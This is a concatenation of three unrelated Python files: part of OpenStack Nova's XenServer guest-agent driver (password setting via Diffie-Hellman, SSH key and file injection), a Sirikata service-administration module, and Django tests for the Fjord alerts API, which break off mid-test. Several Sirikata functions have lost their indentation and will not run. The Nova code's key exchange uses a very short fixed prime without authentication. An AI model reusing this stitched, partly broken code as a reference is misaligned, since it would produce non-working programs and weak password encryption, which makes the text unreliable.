            LOG.error(_('NOT IMPLEMENTED: The call to %(method)s is not '
                        'supported by the agent. args=%(args)r'),
                      {'method': method, 'args': args}, instance=instance)
            raise exception.AgentNotImplemented(method=method)
        else:
            LOG.error(_('The call to %(method)s returned an error: %(e)s. '
                        'args=%(args)r'),
                      {'method': method, 'args': args, 'e': e},
                      instance=instance)
            raise exception.AgentError(method=method)
    if not isinstance(ret, dict):
        try:
            ret = jsonutils.loads(ret)
        except (TypeError, ValueError):
            # BUGFIX: jsonutils.loads raises ValueError for malformed JSON
            # strings; previously only TypeError was caught, letting the
            # ValueError escape instead of raising AgentError.
            LOG.error(_('The agent call to %(method)s returned an invalid '
                        'response: %(ret)r. args=%(args)r'),
                      {'method': method, 'ret': ret, 'args': args},
                      instance=instance)
            raise exception.AgentError(method=method)
    if ret['returncode'] not in success_codes:
        # BUGFIX: message previously read "returned an an error".
        LOG.error(_('The agent call to %(method)s returned '
                    'an error: %(ret)r. args=%(args)r'),
                  {'method': method, 'ret': ret, 'args': args},
                  instance=instance)
        raise exception.AgentError(method=method)
    LOG.debug('The agent call to %(method)s was successful: '
              '%(ret)r. args=%(args)r',
              {'method': method, 'ret': ret, 'args': args},
              instance=instance)
    # Some old versions of the Windows agent have a trailing \\r\\n
    # (ie CRLF escaped) for some reason. Strip that off.
    return ret['message'].replace('\\r\\n', '')
def _wait_for_new_dom_id(session, vm_ref, old_dom_id, method):
    """Poll until the VM reports a valid domid different from old_dom_id,
    or raise AgentTimeout after the configured agent timeout."""
    deadline = time.time() + CONF.xenserver.agent_timeout
    while True:
        current_dom_id = session.VM.get_domid(vm_ref)
        changed = (current_dom_id and current_dom_id != -1
                   and current_dom_id != old_dom_id)
        if changed:
            LOG.debug("Found new dom_id %s" % current_dom_id)
            return
        if time.time() > deadline:
            LOG.debug("Timed out waiting for new dom_id %s" % current_dom_id)
            raise exception.AgentTimeout(method=method)
        time.sleep(1)
def is_upgrade_required(current_version, available_version):
    """Return True when available_version is strictly newer.

    NOTE(johngarbutt): agent version numbers are four part,
    so we need to use the loose version to compare them.
    """
    installed = version.LooseVersion(current_version)
    candidate = version.LooseVersion(available_version)
    return installed < candidate
class XenAPIBasedAgent(object):
    """Driver-side proxy for the guest agent running inside a XenServer VM.

    Operations go through the 'agent' xapi plugin (module-level
    _call_agent); most failures are recorded as instance faults instead
    of being raised to the caller.
    """
    def __init__(self, session, virtapi, instance, vm_ref):
        self.session = session
        self.virtapi = virtapi
        self.instance = instance
        self.vm_ref = vm_ref
    def _add_instance_fault(self, error, exc_info):
        """Log the agent error and attach it to the instance as a fault."""
        LOG.warning(_("Ignoring error while configuring instance with "
                      "agent: %s") % error,
                    instance=self.instance, exc_info=True)
        try:
            ctxt = context.get_admin_context()
            compute_utils.add_instance_fault_from_exc(
                ctxt, self.instance, error, exc_info=exc_info)
        except Exception:
            # Fault recording is best-effort only.
            LOG.debug("Error setting instance fault.", exc_info=True)
    def _call_agent(self, method, addl_args=None, timeout=None,
                    success_codes=None, ignore_errors=True):
        """Call the agent; optionally swallow AgentError as an instance fault."""
        try:
            return _call_agent(self.session, self.instance, self.vm_ref,
                               method, addl_args, timeout, success_codes)
        except exception.AgentError as error:
            if ignore_errors:
                self._add_instance_fault(error, sys.exc_info())
            else:
                raise
    def get_version(self):
        """Return the agent's version string, or None on timeout."""
        LOG.debug('Querying agent version', instance=self.instance)
        # The agent can be slow to start for a variety of reasons. On Windows,
        # it will generally perform a setup process on first boot that can
        # take a couple of minutes and then reboot. On Linux, the system can
        # also take a while to boot.
        expiration = time.time() + CONF.xenserver.agent_version_timeout
        while True:
            try:
                # NOTE(johngarbutt): we can't use the xapi plugin
                # timeout, because the domid may change when
                # the server is rebooted
                return self._call_agent('version', ignore_errors=False)
            except exception.AgentError as error:
                if time.time() > expiration:
                    self._add_instance_fault(error, sys.exc_info())
                    return
    def _get_expected_build(self):
        """Look up the newest registered agent build for this os/arch."""
        ctxt = context.get_admin_context()
        agent_build = objects.Agent.get_by_triple(
            ctxt, 'xen', self.instance['os_type'],
            self.instance['architecture'])
        if agent_build:
            LOG.debug('Latest agent build for %(hypervisor)s/%(os)s'
                      '/%(architecture)s is %(version)s', {
                            'hypervisor': agent_build.hypervisor,
                            'os': agent_build.os,
                            'architecture': agent_build.architecture,
                            'version': agent_build.version})
        else:
            LOG.debug('No agent build found for %(hypervisor)s/%(os)s'
                      '/%(architecture)s', {
                            'hypervisor': 'xen',
                            'os': self.instance['os_type'],
                            'architecture': self.instance['architecture']})
        return agent_build
    def update_if_needed(self, version):
        """Upgrade the in-guest agent if a newer build is registered."""
        agent_build = self._get_expected_build()
        if version and agent_build and \
                is_upgrade_required(version, agent_build['version']):
            LOG.debug('Updating agent to %s', agent_build['version'],
                      instance=self.instance)
            self._perform_update(agent_build)
        else:
            LOG.debug('Skipping agent update.', instance=self.instance)
    def _perform_update(self, agent_build):
        """Ask the agent to download and apply the given build."""
        args = {'url': agent_build['url'], 'md5sum': agent_build['md5hash']}
        try:
            self._call_agent('agentupdate', args)
        except exception.AgentError as exc:
            # Silently fail for agent upgrades
            LOG.warning(_("Unable to update the agent due "
                          "to: %(exc)s") % dict(exc=exc),
                        instance=self.instance)
    def _exchange_key_with_agent(self):
        """Run a Diffie-Hellman exchange with the agent; return the DH
        object holding the shared secret."""
        dh = SimpleDH()
        args = {'pub': str(dh.get_public())}
        # 'D0' is the agent's success code for key_init (not the usual '0').
        resp = self._call_agent('key_init', args, success_codes=['D0'],
                                ignore_errors=False)
        agent_pub = int(resp)
        dh.compute_shared(agent_pub)
        return dh
    def _save_instance_password_if_sshkey_present(self, new_pass):
        """Store new_pass (encrypted with the instance's ssh key) in system
        metadata so it can later be retrieved via the metadata API."""
        sshkey = self.instance.get('key_data')
        if sshkey and sshkey.startswith("ssh-rsa"):
            ctxt = context.get_admin_context()
            enc = crypto.ssh_encrypt_text(sshkey, new_pass)
            self.instance.system_metadata.update(
                password.convert_password(ctxt, base64.b64encode(enc)))
            self.instance.save()
    def set_admin_password(self, new_pass):
        """Set the root/admin password on the VM instance.
        This is done via an agent running on the VM. Communication between nova
        and the agent is done via writing xenstore records. Since communication
        is done over the XenAPI RPC calls, we need to encrypt the password.
        We're using a simple Diffie-Hellman class instead of a more advanced
        library (such as M2Crypto) for compatibility with the agent code.
        """
        LOG.debug('Setting admin password', instance=self.instance)
        try:
            dh = self._exchange_key_with_agent()
        except exception.AgentError as error:
            self._add_instance_fault(error, sys.exc_info())
            return
        # Some old versions of Linux and Windows agent expect trailing \n
        # on password to work correctly.
        enc_pass = dh.encrypt(new_pass + '\n')
        args = {'enc_pass': enc_pass}
        self._call_agent('password', args)
        self._save_instance_password_if_sshkey_present(new_pass)
    def inject_ssh_key(self):
        """Append the instance's ssh public key to root's authorized_keys
        (skipped on Windows or when the image opts out)."""
        sshkey = self.instance.get('key_data')
        if not sshkey:
            return
        if self.instance['os_type'] == 'windows':
            LOG.debug("Skipping setting of ssh key for Windows.",
                      instance=self.instance)
            return
        if self._skip_ssh_key_inject():
            LOG.debug("Skipping agent ssh key injection for this image.",
                      instance=self.instance)
            return
        sshkey = str(sshkey)
        keyfile = '/root/.ssh/authorized_keys'
        key_data = ''.join([
            '\n',
            '# The following ssh key was injected by Nova',
            '\n',
            sshkey.strip(),
            '\n',
        ])
        return self.inject_file(keyfile, key_data)
    def inject_files(self, injected_files):
        """Inject each (path, contents) pair unless the image opts out."""
        if self._skip_inject_files_at_boot():
            LOG.debug("Skipping agent file injection for this image.",
                      instance=self.instance)
        else:
            for path, contents in injected_files:
                self.inject_file(path, contents)
    def inject_file(self, path, contents):
        """Write a file inside the guest via the agent."""
        LOG.debug('Injecting file path: %r', path, instance=self.instance)
        # Files/paths must be base64-encoded for transmission to agent
        b64_path = base64.b64encode(path)
        b64_contents = base64.b64encode(contents)
        args = {'b64_path': b64_path, 'b64_contents': b64_contents}
        return self._call_agent('inject_file', args)
    def resetnetwork(self):
        """Ask the agent to re-apply the guest's network configuration."""
        LOG.debug('Resetting network', instance=self.instance)
        # NOTE(johngarbutt) old FreeBSD and Gentoo agents return 500 on success
        return self._call_agent('resetnetwork',
                                timeout=CONF.xenserver.agent_resetnetwork_timeout,
                                success_codes=['0', '500'])
    def _skip_ssh_key_inject(self):
        """True if the image requested skipping ssh key injection."""
        return self._get_sys_meta_key(SKIP_SSH_SM_KEY)
    def _skip_inject_files_at_boot(self):
        """True if the image requested skipping boot-time file injection."""
        return self._get_sys_meta_key(SKIP_FILES_AT_BOOT_SM_KEY)
    def _get_sys_meta_key(self, key):
        """Read a boolean flag from the instance's system metadata."""
        sys_meta = utils.instance_sys_meta(self.instance)
        raw_value = sys_meta.get(key, 'False')
        return strutils.bool_from_string(raw_value, strict=False)
def find_guest_agent(base_dir):
    """tries to locate a guest agent at the path
    specified by agent_rel_path

    Returns True when a usable agent binary exists in the mounted image
    at base_dir (network injection can then be skipped), False otherwise.
    """
    if CONF.xenserver.disable_agent:
        return False
    agent_rel_path = CONF.xenserver.agent_path
    agent_path = os.path.join(base_dir, agent_rel_path)
    if os.path.isfile(agent_path):
        # The presence of the guest agent
        # file indicates that this instance can
        # reconfigure the network from xenstore data,
        # so manipulation of files in /etc is not
        # required
        # BUGFIX: added the missing trailing space so the logged message
        # no longer reads "will not bemanipulated".
        LOG.info(_('XenServer tools installed in this '
                   'image are capable of network injection. '
                   'Networking files will not be '
                   'manipulated'))
        return True
    xe_daemon_filename = os.path.join(base_dir,
                                      'usr', 'sbin', 'xe-daemon')
    if os.path.isfile(xe_daemon_filename):
        LOG.info(_('XenServer tools are present '
                   'in this image but are not capable '
                   'of network injection'))
    else:
        LOG.info(_('XenServer tools are not '
                   'installed in this image'))
    return False
def should_use_agent(instance):
    """Decide whether the agent should be used for this instance, based on
    its system metadata hint, falling back to the configured default."""
    sys_meta = utils.instance_sys_meta(instance)
    if USE_AGENT_SM_KEY not in sys_meta:
        return CONF.xenserver.use_agent_default
    use_agent_raw = sys_meta[USE_AGENT_SM_KEY]
    try:
        return strutils.bool_from_string(use_agent_raw, strict=True)
    except ValueError:
        LOG.warn(_("Invalid 'agent_present' value. "
                   "Falling back to the default."),
                 instance=instance)
        return CONF.xenserver.use_agent_default
class SimpleDH(object):
    """This class wraps all the functionality needed to implement
    basic Diffie-Hellman-Merkle key exchange in Python. It features
    intelligent defaults for the prime and base numbers needed for the
    calculation, while allowing you to supply your own. It requires that
    the openssl binary be installed on the system on which this is run,
    as it uses that to handle the encryption and decryption. If openssl
    is not available, a RuntimeError will be raised.
    """
    def __init__(self):
        # Fixed prime/base shared with the in-guest agent implementation.
        self._prime = 162259276829213363391578010288127
        self._base = 5
        self._public = None
        self._shared = None
        self.generate_private()

    def generate_private(self):
        # 10 random bytes -> 80-bit private exponent.
        random_hex = binascii.hexlify(os.urandom(10))
        self._private = int(random_hex, 16)
        return self._private

    def get_public(self):
        # public = base ^ private mod prime
        self._public = pow(self._base, self._private, self._prime)
        return self._public

    def compute_shared(self, other):
        # shared = other_public ^ private mod prime
        self._shared = pow(other, self._private, self._prime)
        return self._shared

    def _run_ssl(self, text, decrypt=False):
        # The shared secret doubles as the symmetric passphrase.
        cmd = ['openssl', 'aes-128-cbc', '-A', '-a', '-pass',
               'pass:%s' % self._shared, '-nosalt']
        if decrypt:
            cmd.append('-d')
        out, err = utils.execute(*cmd, process_input=text)
        if err:
            raise RuntimeError(_('OpenSSL error: %s') % err)
        return out

    def encrypt(self, text):
        return self._run_ssl(text).strip('\n')

    def decrypt(self, text):
        return self._run_ssl(text, decrypt=True)
|
|
'''
A service is one component of a running Sirikata system, e.g. a single
space server, object host, pinto or cseg server. Each service must be
uniquely named and gets isolated storage where it is executed. Usually
a service will be based on a template.
'''
import util
import serviceconfig
import package
import monit
import os.path, subprocess, shutil
# Utilities
def services_path():
    """Return the path of the directory holding all service data."""
    return util.data_path('service')
def service_path(service, *args):
    """Return the path of a file or directory under the given service."""
    return util.data_path('service', service, *args)
def service_load_config(service):
    """Load (into the serviceconfig module) and return the configuration
    for the given service."""
    return util.load_config(serviceconfig, 'service', service)
def service_validate_config(service):
    """
    Validate basic configuration options exist and are valid for the
    given service.
    """
    # NOTE(review): failure paths return 1 while the success path returns
    # True; command_service_ls relies on `is True`, so these return values
    # must not be normalized.
    if not service_load_config(service):
        return 1
    # Package
    if not serviceconfig.package:
        print "You must specify a package to provide binaries"
        return 1
    package.package_load_config(serviceconfig.package)
    installdir = package.install_dir(serviceconfig.package)
    bindir = os.path.join(installdir, 'bin')
    if not os.path.exists(installdir) or not os.path.exists(bindir):
        print "Couldn't find installed binaries in package", serviceconfig.package
        return 1
    # Binary
    if not serviceconfig.binary:
        print "You must specify a binary to execute."
        return 1
    binfile = os.path.join(bindir, serviceconfig.binary)
    if not os.path.exists(binfile) or not os.path.isfile(binfile):
        print "Couldn't find binary file", serviceconfig.binary, "in package", serviceconfig.package
        return 1
    # Args - nothing to check, they can be omitted
    return True
# Commands
def command_service_init(*args):
'''
admin service init service_name package [template/path/]
Initialize service directory, optionally copying a template
service in to get it initialized. You must always specify a
package, which will be placed in the configuration so the service
uses binaries from that package.
'''
if len(args) < 2:
print "Must specify at least service name and package."
return 1
servname = args[0]
packname = args[1]
template = None
if len(args) > 2:
template = args[2]
if not os.path.exists(util.template_path(template)):
print "Couldn't find template", template
return 1
if os.path.exists(service_path(servname)):
print "Can't create service", servname, ": already exists"
return 1
return command_service_reinit(*args)
def command_service_reinit(*args):
    '''
    admin service reinit service_name package [template/path/]
    Reinitialize a service directory, which does what init does but
    will overwrite any existing files. This keeps data in place so
    data can be preserved if the corresponding files haven't changed,
    but the service is forced into a state to match the template
    service.
    '''
    if len(args) < 2:
        print "Must specify at least service name and package."
        return 1
    servname = args[0]
    packname = args[1]
    template = None
    if len(args) > 2:
        template = args[2]
        if not os.path.exists(util.template_path(template)):
            print "Couldn't find template", template
            return 1
    # Copy in template items. To support both init and reinit we:
    # 1. Make sure we have the top level directory
    serv_path = service_path(servname)
    if not os.path.exists(serv_path): os.makedirs(serv_path)
    # 2. Copy all the contents of the template in, excluding the config
    # NOTE(review): this runs even when no template was given, calling
    # util.template_path(None) — confirm that is handled upstream.
    template_dir = util.template_path(template)
    for fi in os.listdir(template_dir):
        if fi != 'config.py':
            template_fi = os.path.join(template_dir, fi)
            serv_fi = os.path.join(serv_path, fi)
            # copytree for directories, plain copy for files.
            if os.path.isdir(template_fi):
                shutil.copytree(template_fi, serv_fi)
            else:
                shutil.copy(template_fi, serv_fi)
    # Write or overwrite the config file. We need to insert the
    # referenced package and optionally include the template config
    serv_config_py = service_path(servname, 'config.py')
    config_py_file = open(serv_config_py, 'w')
    config_py_file.write("""
package = '%s'
""" % (packname))
    if template:
        template_config = util.template_path(template, 'config.py')
        if os.path.exists(template_config):
            # Append the template's config after the package line.
            with open(template_config) as f:
                config_py_file.write(f.read())
    config_py_file.close()
    return 0
def command_service_ls(*args):
    """
    admin service ls
    List services found in this deployments data directory. A * is
    appended if the configuration for the service validates.
    """
    # Services, unlike templates and packages, can appear at different
    # depths in the tree, so we need to do a full walk looking for
    # configs.
    services_dirs = [dirpath for (dirpath,dirnames,filenames) in os.walk(services_path()) if 'config.py' in filenames]
    for servpath in services_dirs:
        # We need to extract the service name, which could be a
        # compound of multiple dirs. Grab everything after the path
        # giving the base of the services directory (+ an extra /)
        assert(servpath.startswith(services_path()))
        servname = servpath[len(services_path())+1:]
        # Filter to directories with config files.
        if not os.path.isdir(service_path(servname)): continue
        if not service_load_config(servname): continue
        validates_flag = ''
        # service_validate_config returns True on success but 1 on
        # failure, hence the identity check.
        if service_validate_config(servname) is True:
            validates_flag = '*'
        print servname, validates_flag
    return 0
def get_run_params(servname):
    """Gather the paths and binary information needed to run servname,
    returned as a simple attribute bag."""
    class Params(object):
        pass
    # Load and validate config
    service_validate_config(servname)
    params = Params()
    params.name = servname
    params.work_dir = service_path(servname)
    params.pidfile = service_path(servname, 'pid')
    params.installdir = package.install_dir(serviceconfig.package)
    params.bindir = os.path.join(params.installdir, 'bin')
    params.binfile = os.path.join(params.bindir, serviceconfig.binary)
    return params
def command_service_rawstart(*args):
'''
admin service rawstart service_name
Start a service running. This is the 'raw' version, which doesn't
deal with any wrappers like monit. It just starts the daemon
running. You generally shouldn't need to use this, it's just a
utility command.
'''
if len(args) == 0:
print 'No service name specified'
return 1
params = get_run_params(*args)
args = []
if serviceconfig.args:
args += ['--'] + serviceconfig.args
cmd = ['start-stop-daemon', '--start', '--quiet', '--background',
'--chdir', params.work_dir,
'--pidfile', params.pidfile, '--make-pidfile',
'--exec', params.binfile]
cmd += args
return subprocess.call(cmd, cwd=params.work_dir)
def command_service_rawstop(*args):
'''
admin service rawstop service_name
Stop a currently running service. This is a raw version which
doesn't handle any wrappers like monit. Generally it should only
be used internally.
'''
if len(args) == 0:
print 'No service name specified'
return 1
params = get_run_params(*args)
cmd = ['start-stop-daemon', '--stop', '--retry', '10', '--quiet', '--pidfile', params.pidfile]
return subprocess.call(cmd, cwd=params.work_dir)
def command_service_start(*args):
'''
admin service start service_name
Start a service running
'''
if len(args) == 0:
print 'No service name specified'
return 1
params = get_run_params(*args)
if serviceconfig.monit:
monit.start_service(args[0])
else:
command_service_rawstart(*args)
def command_service_stop(*args):
'''
admin service start service_name
Stop a currently running service.
'''
if len(args) == 0:
print 'No service name specified'
return 1
params = get_run_params(*args)
if serviceconfig.monit:
monit.stop_service(args[0])
else:
command_service_rawstop(*args)
def command_service_debug(*args):
'''
admin service debug service_name
Start a service running under gdb so you can debug it. This
doesn't add any of the wrappers provided by the normal service
start/stop commands
'''
if len(args) == 0:
print 'No service name specified'
return 1
params = get_run_params(*args)
cmd = [params.binfile, '--debug']
if serviceconfig.args:
cmd += serviceconfig.args
return subprocess.call(cmd, cwd=params.work_dir)
def command_service_destroy(*args):
"""
admin service destroy service_name
Destroy a service, i.e. remove all its contents from the filesystem.
"""
if len(args) == 0:
print 'No service name specified'
return 1
servname = args[0]
service_validate_config(servname)
servdir = service_path(servname)
if not os.path.exists(servdir):
return 1
# Try to stop before we destroy anything, just to be sure we clean
# up. Worst case, this just fails to do anything
command_service_stop(*args)
shutil.rmtree(servdir)
return 0
|
|
import datetime
import json
import urllib
from uuid import uuid4
from django.test.utils import override_settings
from . import AlertFlavorFactory, AlertFactory, LinkFactory
from fjord.alerts.models import Alert, Link
from fjord.api_auth.tests import TokenFactory
from fjord.base.tests import reverse, TestCase, WHATEVER
class AlertsGetAPIAuthTest(TestCase):
    """Authentication/authorization behaviour of GET on the alerts API.

    NOTE(review): relies on the AlertFlavorFactory/TokenFactory fixtures
    and the Django test client; error bodies are DRF-style JSON.
    """

    def test_missing_flavor(self):
        """Unknown flavor slugs yield a 400 naming each bad slug."""
        qs = {
            'flavors': 'fooflavor'
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs)
        )
        assert resp.status_code == 400
        assert (
            json.loads(resp.content) ==
            {'detail': {'flavors': ['Flavor "fooflavor" does not exist.']}}
        )
        # Multiple unknown flavors: one error message per slug.
        qs = {
            'flavors': 'fooflavor,barflavor'
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs)
        )
        assert resp.status_code == 400
        assert (
            json.loads(resp.content) ==
            {'detail': {'flavors': [
                'Flavor "fooflavor" does not exist.',
                'Flavor "barflavor" does not exist.'
            ]}}
        )
        # A mix of known and unknown flavors still fails on the unknown one.
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        qs = {
            'flavors': 'barflavor,' + flavor.slug
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs)
        )
        assert resp.status_code == 400
        assert (
            json.loads(resp.content) ==
            {'detail': {'flavors': ['Flavor "barflavor" does not exist.']}}
        )

    def test_missing_auth_token(self):
        """No Authorization header at all yields a 401."""
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        qs = {
            'flavors': flavor.slug
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs)
        )
        assert resp.status_code == 401
        assert (
            json.loads(resp.content) ==
            {'detail': 'Authentication credentials were not provided.'}
        )

    def test_missing_malformed_auth_token(self):
        """Empty or malformed Authorization headers yield a 401."""
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        qs = {
            'flavors': flavor.slug
        }
        # Empty header: treated as missing credentials.
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION=''
        )
        assert resp.status_code == 401
        assert (
            json.loads(resp.content) ==
            {'detail': 'Authentication credentials were not provided.'}
        )
        # 'token' keyword with no token value.
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token'
        )
        assert resp.status_code == 401
        assert (
            json.loads(resp.content) ==
            {'detail': 'Invalid token header. No token provided.'}
        )
        # Too many space-separated parts.
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token token token'
        )
        assert resp.status_code == 401
        assert (
            json.loads(resp.content) ==
            {'detail': ('Invalid token header. Token string should not '
                        'contain spaces.')}
        )

    def test_not_permitted(self):
        """A valid token not on the flavor's allowed list yields a 403."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        qs = {
            'flavors': flavor.slug
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 403
        assert (
            json.loads(resp.content) ==
            {'detail': 'You do not have permission to perform this action.'}
        )

    def test_not_all_permitted(self):
        """The token must be permitted for every requested flavor."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor2 = AlertFlavorFactory(name='Bar', slug='barflavor')
        flavor.allowed_tokens.add(token)
        qs = {
            'flavors': flavor.slug + ',' + flavor2.slug
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 403
        assert (
            json.loads(resp.content) ==
            {'detail': 'You do not have permission to perform this action.'}
        )
        # Reverse the order of flavors to make sure that also works
        qs = {
            'flavors': flavor2.slug + ',' + flavor.slug
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 403
        assert (
            json.loads(resp.content) ==
            {'detail': 'You do not have permission to perform this action.'}
        )

    def test_disabled_flavor(self):
        """Requesting a disabled flavor yields a 400 even when permitted."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(
            name='Foo', slug='fooflavor', enabled=False)
        flavor.allowed_tokens.add(token)
        qs = {
            'flavors': flavor.slug
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 400
        assert (
            json.loads(resp.content) ==
            {'detail': {'flavors': ['Flavor "fooflavor" is disabled.']}}
        )

    def test_fjord_authorization_token(self):
        """Verify auth will use Fjord-Authorization header if Authorization
        isn't there
        """
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        qs = {
            'flavors': flavor.slug
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_FJORD_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 200
        assert (
            json.loads(resp.content) ==
            {u'count': 0, u'total': 0, u'alerts': []}
        )
class AlertsGetAPITest(TestCase):
    """GET on the alerts API: argument validation, filters and payload
    shape (count/total/alerts with full alert dicts).
    """

    def test_bad_args(self):
        """Unknown querystring arguments yield a 400."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        AlertFactory(summary=u'alert 1', flavor=flavor)
        qs = {
            'flavors': flavor.slug,
            'foo': 'bar'
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 400
        assert (
            json.loads(resp.content) ==
            {
                'detail': {
                    'non_field_errors': ['"foo" is not a valid argument.']
                }
            }
        )

    def test_get_one_flavor(self):
        """All alerts of a single flavor are returned with full payload."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        AlertFactory(summary=u'alert 1', flavor=flavor)
        AlertFactory(summary=u'alert 2', flavor=flavor)
        AlertFactory(summary=u'alert 3', flavor=flavor)
        qs = {
            'flavors': flavor.slug
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 200
        assert (
            json.loads(resp.content) ==
            {
                u'count': 3,
                u'total': 3,
                u'alerts': [
                    {
                        u'id': WHATEVER,
                        u'summary': u'alert 1',
                        u'description': u'the account balance is at $5.',
                        u'flavor': flavor.slug,
                        u'emitter_version': 0,
                        u'emitter_name': u'balance-checker',
                        u'start_time': None,
                        u'end_time': None,
                        u'created': WHATEVER,
                        u'severity': 0,
                        u'links': []
                    }, {
                        u'id': WHATEVER,
                        u'summary': u'alert 2',
                        u'description': u'the account balance is at $5.',
                        u'flavor': flavor.slug,
                        u'emitter_version': 0,
                        u'emitter_name': u'balance-checker',
                        u'start_time': None,
                        u'end_time': None,
                        u'created': WHATEVER,
                        u'severity': 0,
                        u'links': []
                    }, {
                        u'id': WHATEVER,
                        u'summary': u'alert 3',
                        u'description': u'the account balance is at $5.',
                        u'flavor': flavor.slug,
                        u'emitter_version': 0,
                        u'emitter_name': u'balance-checker',
                        u'start_time': None,
                        u'end_time': None,
                        u'created': WHATEVER,
                        u'severity': 0,
                        u'links': []
                    }
                ]
            }
        )

    def test_get_multiple_flavors(self):
        """Asking for several flavors returns the union of their alerts."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        flavor2 = AlertFlavorFactory(name='Bar', slug='barflavor')
        flavor2.allowed_tokens.add(token)
        AlertFactory(summary=u'alert 1', flavor=flavor)
        AlertFactory(summary=u'alert 2', flavor=flavor2)
        qs = {
            'flavors': flavor.slug + ',' + flavor2.slug
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 200
        assert (
            json.loads(resp.content) ==
            {
                u'count': 2,
                u'total': 2,
                u'alerts': [
                    {
                        u'id': WHATEVER,
                        u'summary': u'alert 1',
                        u'description': u'the account balance is at $5.',
                        u'flavor': flavor.slug,
                        u'emitter_version': 0,
                        u'emitter_name': u'balance-checker',
                        u'start_time': None,
                        u'end_time': None,
                        u'created': WHATEVER,
                        u'severity': 0,
                        u'links': []
                    }, {
                        u'id': WHATEVER,
                        u'summary': u'alert 2',
                        u'description': u'the account balance is at $5.',
                        u'flavor': flavor2.slug,
                        u'emitter_version': 0,
                        u'emitter_name': u'balance-checker',
                        u'start_time': None,
                        u'end_time': None,
                        u'created': WHATEVER,
                        u'severity': 0,
                        u'links': []
                    }
                ]
            }
        )

    def test_max(self):
        """'max' caps the count returned; newest alerts win, total is all."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        alert1 = AlertFactory(summary=u'alert 1', flavor=flavor)
        # We backdate the created so we can verify we're getting the
        # right order of alerts.
        alert1.created = datetime.datetime.now() - datetime.timedelta(days=5)
        alert1.save()
        AlertFactory(summary=u'alert 2', flavor=flavor)
        qs = {
            'flavors': flavor.slug,
            'max': 1
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 200
        assert (
            json.loads(resp.content) ==
            {
                u'count': 1,
                u'total': 2,
                u'alerts': [
                    {
                        u'id': WHATEVER,
                        u'summary': u'alert 2',
                        u'description': u'the account balance is at $5.',
                        u'flavor': flavor.slug,
                        u'emitter_version': 0,
                        u'emitter_name': u'balance-checker',
                        u'start_time': None,
                        u'end_time': None,
                        u'created': WHATEVER,
                        u'severity': 0,
                        u'links': []
                    }
                ]
            }
        )

    def test_bad_max(self):
        """Non-integer or < 1 'max' values yield a 400."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        qs = {
            'flavors': flavor.slug,
            'max': 'one'
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 400
        assert (
            json.loads(resp.content) ==
            {'detail': {'max': ['A valid integer is required.']}}
        )
        # Zero is out of range: max must be >= 1.
        qs = {
            'flavors': flavor.slug,
            'max': 0
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 400
        assert (
            json.loads(resp.content) ==
            {
                'detail': {
                    'max': [
                        'Ensure this value is greater than or equal to 1.'
                    ]
                }
            }
        )

    def test_start_time(self):
        """start_time_start/start_time_end filter alerts by start_time."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        today = datetime.datetime.now()
        yesterday = today - datetime.timedelta(days=1)
        daybeforeyesterday = yesterday - datetime.timedelta(days=1)
        alert1 = AlertFactory(
            summary=u'alert 1',
